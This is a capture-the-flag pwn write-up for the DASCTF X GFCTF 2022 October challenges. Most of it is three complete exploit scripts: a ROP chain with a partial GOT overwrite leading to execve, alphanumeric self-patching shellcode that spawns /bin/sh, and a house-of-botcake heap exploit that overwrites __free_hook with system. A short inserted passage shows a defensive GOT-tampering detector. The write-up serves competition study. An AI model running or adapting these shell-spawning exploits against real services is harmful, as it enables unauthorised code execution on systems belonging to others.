
DASCTF X GFCTF 2022 October Challenge pwn writeup

Time: 2022-10-24 17:24:49  Views: 67
Tags: xor libc elf GFCTF eax promise 2022 wp rax


Solved these fairly casually.

1 r()p

The chain can be built from the following gadgets:

# once rax is controlled: write to an arbitrary address (read into rsi = rax)
.text:000000000040115A                 mov     rsi, rax        ; buf
.text:000000000040115D                 mov     edx, dword ptr [rsp+18h+buf] ; nbytes
.text:0000000000401161                 xor     edi, edi        ; fd
.text:0000000000401163                 mov     eax, 0
.text:0000000000401168                 call    _read

# control rax
0x000000000040116d: mov eax, dword ptr [rsp + 0xc]; add rsp, 0x18; ret;

# control rdi
0x0000000000401099: mov edi, 0x404018; jmp rax;

Then overwrite only the lowest byte of got@read so that it points at the `syscall` instruction inside libc's read(); with rax set to the execve syscall number, the final "read" call becomes execve.
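From the defender's side, the partial GOT overwrite above leaves a tell: a resolved GOT slot should be exactly the start of an exported libc symbol, whereas here got@read lands somewhere inside read(). The following is an added example (not part of the write-up or of pwncli) that classifies a GOT snapshot, e.g. one pulled from a core dump; all addresses, symbol offsets and the `GOT_SNAPSHOT` are constructed, and the helper names are mine.

```python
from bisect import bisect_right

# Constructed libc layout (symbol -> offset from libc base); these are NOT real glibc offsets.
LIBC_SYMS = {"setvbuf": 0x80ce0, "puts": 0x80e50, "read": 0x114a00, "write": 0x114a90}
LIBC_BASE = 0x7f3a2c000000
# The binary's .text range; a GOT slot still pointing here is simply unresolved (lazy binding).
BIN_TEXT = (0x401000, 0x402000)

# Constructed GOT snapshot, as if read out of a core dump. read's slot had its lowest byte
# replaced (0x00 -> 0x0f) the way the chain above does; the other slots are untouched.
GOT_SNAPSHOT = {
    "puts": LIBC_BASE + 0x80e50,
    "setvbuf": LIBC_BASE + 0x80ce0,
    "read": LIBC_BASE + 0x114a0f,
    "write": 0x401046,
}


def classify_got(got, libc_base=LIBC_BASE, libc_syms=LIBC_SYMS, bin_text=BIN_TEXT):
    """Map each GOT slot to 'ok', 'unresolved', or a description of the tampering."""
    starts = sorted((libc_base + off, name) for name, off in libc_syms.items())
    start_addrs = [addr for addr, _ in starts]
    verdicts = {}
    for slot, target in got.items():
        if bin_text[0] <= target < bin_text[1]:
            verdicts[slot] = "unresolved"
            continue
        if slot in libc_syms and target == libc_base + libc_syms[slot]:
            verdicts[slot] = "ok"
            continue
        # Not a clean symbol start: report which function it lands inside and how far in.
        i = bisect_right(start_addrs, target) - 1
        if i < 0:
            verdicts[slot] = f"tampered: 0x{target:x} lies below every known libc symbol"
        else:
            sym_addr, sym = starts[i]
            verdicts[slot] = f"tampered: points to {sym}+0x{target - sym_addr:x}"
    return verdicts


def tampered_slots(got=GOT_SNAPSHOT):
    """Names of the slots that are neither clean nor merely unresolved."""
    return sorted(s for s, v in classify_got(got).items() if v.startswith("tampered"))


if __name__ == "__main__":
    for slot, verdict in classify_got(GOT_SNAPSHOT).items():
        print(f"{slot:8s} {verdict}")
```

On a live process the same comparison can be made from the resolved GOT and the loaded libc's symbol table; anything reported as `<symbol>+<non-zero offset>` deserves a look.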

#!/usr/bin/env python3
# Date: 2022-10-24 16:33:10
# Link: https://github.com/RoderickChan/pwncli
# Usage:
#     Debug : python3 exp.py debug elf-file-path -t -b malloc
#     Remote: python3 exp.py remote elf-file-path ip:port

# debug in Ubuntu 22.04
from pwncli import *
cli_script()

io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)

# 0x000000000040116d: mov eax, dword ptr [rsp + 0xc]; add rsp, 0x18; ret;
# 0x0000000000401099: mov edi, 0x404018; jmp rax;

s(p32(0x400) + p32(0) + flat({
    0x4: 0x404018,
    0x10: 0x40115A,
    0x24: p32(0x8),
    0x30: 0x000000000040116d,
    0x44: elf.got.read,
    0x50: 0x40115A,
    0x64: p32(1), # eax
    0x70: 0x000000000040116d,
    0x84: p32(elf.bss(0x100)),
    0x90: 0x40115A,
    0xa4: p32(elf.bss(0x100)),
    0xb0: 0x000000000040116d,
    0xb0+0x14: p32(CurrentGadgets.ret()),
    0xd0: 0x0000000000401099,
    0xd8: 0x000000000040116d,
    0xd8+0x14: p32(SyscallNumber.amd64.EXECVE),
    0xd8+0x20: elf.plt.read
}, length=0x100))

sleep(3)
s("/bin/sh\x00") # write /bin/sh at 0x404018
sleep(3)
if gift.debug:
    s("\x90") # write lowest byte of got@read
else: # remote
    s("\x0f") # write lowest byte of got@read
sleep(3)
s("\x00") # set rsi rdx
sleep(3)
log_ex("Now Get Shell!")

ia()

2 1!5!

Just read the script.

#!/usr/bin/env python3
# Date: 2022-10-24 15:43:47
# Link: https://github.com/RoderickChan/pwncli
# Usage:
#     Debug : python3 exp.py debug elf-file-path -t -b malloc
#     Remote: python3 exp.py remote elf-file-path ip:port

from pwncli import *

cli_script()

"""
Stages:
1. rbx is 0, we can control rcx, rdx, rax, firstly invoke system call `read` by `int 0x80` to read again
2. read execve shellcode to getshell

Tips(hex shellcode): 
1. 35XXXXXXXX    --> xor eax, XXXX
2. \x00\x00 --> add [rax], al (byte), oveflow to get more single byte
3. cd80     --> int 0x80
4. 31414c   --> xor [rcx+0x4c], eax (byte)
5. 0x80 = 0x4f + 0x31
6. 0xcd = 5 * 0x4e + 0x47
"""

s(flat({
    0: asm("""
           push rdx
           pop rcx
           xor eax, 0x41414141
           xor [rcx+0x41], eax
           xor eax, 0x41414545 /* eax: 0404*/
           xor [rcx+0x43], eax
           /*mov eax, 0x1014f*/
           push rsi
           pop rax
           xor eax, 0x42424242
           xor eax, 0x42434342
           """),
    0x41: "AAAA",
    0x45: asm("""
            push r9
            pop rax
            xor eax, 0x42434342
            xor eax, 0x42424242
            push rax
            pop rcx
            push r9
            pop rax
            xor eax, 0x41414141
            xor [rcx+0x41], eax
            xor [rcx+0x45], eax
            xor [rcx+0x49], eax
            xor eax, 0x41414545 /* eax: 0404*/
            xor [rcx+0x4b], eax
            push rdx
            pop rcx
            push rax
            pop rdx
            push r9
            pop rax
            xor eax, 0x41414141
            xor eax, 0x41414142
            /*push 0x3*/
            push rax
            /*mov eax, 0x1014e*/
            push rsi
            pop rax
            xor eax, 0x42424242
            xor eax, 0x42434343
              """),
    0x141: "AAAAAAAAAAAA\x58", # now int 0x80 is ok
    0x14e: "\x47", # + 5 * 0x4e;  int 0x80 --> \xcd\x80
    0x14f: "\x31",
    0x1ff: "\x4f"
}, filler="\x59\x51", length=0x200))

log_ex("Now Get Shell!")
s(b"\x90"*0x152 + ShellcodeMall.amd64.execve_bin_sh)

ia()

3 magic_book

Still got first blood after a meeting that ran past five o'clock...... it tests a basic house of botcake.

#!/usr/bin/env python3
# Date: 2022-10-23 17:05:38
# Link: https://github.com/RoderickChan/pwncli
# Usage:
#     Debug : python3 exp.py debug elf-file-path -t -b malloc
#     Remote: python3 exp.py remote elf-file-path ip:port

# bruteforce: for i in $(seq 1 16); do ./exp.py re ./pwn IP:PORT -nl; done

from pwncli import *
cli_script()

io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

def cmd(i, prompt="Your choice : "):
    sla(prompt, i)

def promise(sz, data="/bin/sh\x00"):
    cmd('1')
    sla("Size: ", str(sz))
    sa("Content: ", data)

def recall(i):
    cmd('2')
    sla("Index: ", str(i))
def gift_(i):
    cmd("9")
    sla("Index: ", str(i))

log_ex("Heap fengshui!")
promise(0x100)
promise(0x100) # 1

promise(0x70) # 2
promise(0x100, flat({
    0x20: [
        0x140, 0x20,
        0, 0,
        0, 0xc1 # change ub's size
    ]
    })) # 3

for i in range(6): # indexes 4-9
    promise(0x100)

for i in range(3, 10):
    recall(i)

gift_(1)
recall(0)

promise(0x100)
recall(1)

promise(0x70)
promise(0x80)

log_ex("Bruteforce to leak glibc address!")
if gift.debug:
    stdoutaddr = gift._libc_base + libc.sym._IO_2_1_stdout_
    stdoutaddr &= 0xffff
else:
    stdoutaddr = 0x96a0

leak("stdoutaddr", stdoutaddr)

promise(0x70, p16(stdoutaddr))

promise(0x100, flat("a"*0x70, 0, 0x141)) # change ub size

promise(0x100, flat(0xfbad1887, 0, 0, 0, "\x00"))

lb = recv_current_libc_addr(0x1ec980)
assert (lb >> 40) in (0x7f, 0x7e), "wrong libc base!"
set_current_libc_base_and_log(lb)

recall(0xb)
recall(2)
promise(0xa0, b"a"*0x90 + p64_ex(libc.sym.__free_hook - 8))

promise(0x70)
promise(0x70, p64(0)+p64(libc.sym.system))

recall(0xa)

sleep(0.2)
log_ex("Now Get Shell!")

ia()

From: https://www.cnblogs.com/LynneHuan/p/16822129.html
